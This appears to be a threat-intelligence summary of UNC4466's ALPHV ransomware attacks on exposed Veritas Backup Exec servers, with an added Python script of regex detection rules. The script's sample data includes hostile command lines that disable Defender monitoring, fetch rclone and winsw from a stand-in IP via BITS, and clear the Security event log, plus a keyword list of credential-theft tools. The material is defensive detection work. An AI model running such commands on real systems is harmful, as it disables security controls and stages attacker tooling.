ALPHV Ransomware Targets Vulnerable Veritas Backup Exec Installations: UNC4466 Attack Lifecycle and Detection Opportunities

UNC4466, a new ALPHV ransomware affiliate, has been observed by Mandiant targeting publicly exposed Veritas Backup Exec installations vulnerable to CVE-2021-27876, CVE-2021-27877, and CVE-2021-27878 for initial access to victim environments. A commercial Internet scanning service has identified over 8,500 instances of Veritas Backup Exec that are currently exposed to the internet, some of which may still be unpatched and vulnerable. In this blog post, we will explore the UNC4466 attack lifecycle, indicators, and detection opportunities.

The blog post will also discuss the emergence of ALPHV as a ransomware-as-a-service that some researchers have claimed is the successor to BLACKMATTER and DARKSIDE ransomware. Despite some ransomware operators enacting rules to avoid impacting critical infrastructure and health entities, ALPHV continues to target sensitive industries.

The timeline for the attack shows that in March 2021, Veritas published an advisory reporting three critical vulnerabilities in Veritas Backup Exec 16.x, 20.x, and 21.x. On September 23, 2022, a METASPLOIT module was released that exploits these vulnerabilities and creates a session that the threat actor can use to interact with the victim system. On October 22, 2022, Mandiant first observed exploitation of the Veritas vulnerabilities in the wild.

UNC4466's attack phases began with initial compromise and establishing a foothold on a Windows server running Veritas Backup Exec version 21.0, using the Metasploit module exploit/multi/veritas/beagent_sha_auth_rce. After that, UNC4466 used Internet Explorer to download Famatech's Advanced IP Scanner from its website, hxxps://download.advanced-ip-scanner[.]com, and scanned IP addresses for open ports, hostnames, operating system, and hardware manufacturer information. UNC4466 also used ADRecon to gather network, account, and host information in the victim's environment.

UNC4466 then made heavy use of the Background Intelligent Transfer Service (BITS) to download additional tools such as LAZAGNE, LIGOLO, WINSW, RCLONE, and finally, the ALPHV ransomware encryptor. The threat actor utilized multiple credential access tools, including Mimikatz, LaZagne, and Nanodump to gather clear-text credentials and credential material. UNC4466 also took steps to evade detection, including clearing event logs and disabling Microsoft Defender's real-time monitoring capability using the built-in Set-MpPreference cmdlet.
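As an added example that is not part of the Mandiant post, the following Python script runs simple detection rules over constructed process-creation command lines (as a SIEM might see from Sysmon Event ID 1 or Windows Event ID 4688) covering the behaviours described above: Defender real-time monitoring disabled via Set-MpPreference, BITS downloads to disk, event-log clearing, and the named tooling. The rule names, the sample command lines and the IP address 203.0.113.5 are constructed for illustration.

```python
import re

# Constructed sample command lines; not real UNC4466 telemetry.
SAMPLE_COMMAND_LINES = [
    r'powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true',
    r'powershell.exe Start-BitsTransfer -Source http://203.0.113.5/rclone.exe '
    r'-Destination C:\Windows\Temp\rclone.exe',
    r'bitsadmin.exe /transfer job1 http://203.0.113.5/winsw.exe C:\Temp\winsw.exe',
    r'wevtutil.exe cl Security',
    r'C:\Program Files\Veritas\Backup Exec\beremote.exe',
    r'C:\Users\admin\Downloads\Advanced_IP_Scanner_2.5.exe /portable',
    r'notepad.exe C:\Users\admin\notes.txt',
]

# Detection rules: (name, compiled regex). Each maps to one behaviour the
# post attributes to UNC4466. Rule names are our own.
RULES = [
    ("defender_realtime_disabled",
     re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$?true", re.I)),
    ("bits_download_to_disk",
     re.compile(r"(Start-BitsTransfer\b|bitsadmin(\.exe)?\s+/transfer\b)", re.I)),
    ("event_log_cleared",
     re.compile(r"wevtutil(\.exe)?\s+cl\s+\S+", re.I)),
    ("known_tool_name",
     re.compile(r"(advanced_ip_scanner|adrecon|lazagne|ligolo|winsw|rclone|"
                r"mimikatz|nanodump)", re.I)),
]


def classify(command_line):
    """Return the names of all rules that match one process command line."""
    return [name for name, rx in RULES if rx.search(command_line)]


def triage(command_lines):
    """Map each suspicious command line to its matched rule names.
    Lines that match no rule are omitted from the result."""
    hits = {}
    for cmd in command_lines:
        matched = classify(cmd)
        if matched:
            hits[cmd] = matched
    return hits


if __name__ == "__main__":
    for cmd, rules in triage(SAMPLE_COMMAND_LINES).items():
        print(f"{', '.join(rules):<45} {cmd}")
```

A single hit on the Defender or event-log rule is worth an alert on its own; several rules firing on one host within minutes mirrors the tool-staging sequence the post describes.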

UNC4466 deployed the Rust-based ALPHV ransomware, adding immediate tasks to the default domain policy that were configured to disable security software, download the ALPHV encryptor, and execute it. As of the blog post's date, over 8,500 IP addresses advertise the "Symantec/Veritas Backup Exec ndmp" service on the default port 10000, as well as port 9000 and port 10001, demonstrating the prevalence of internet-exposed instances that could potentially be probed by attackers.

In conclusion, UNC4466's attacks on Veritas Backup Exec installations underscore the importance of patching software and maintaining network security to prevent ransomware attacks. Internet-exposed instances of Veritas Backup Exec need to be monitored closely, and organizations should take proactive measures to secure their networks.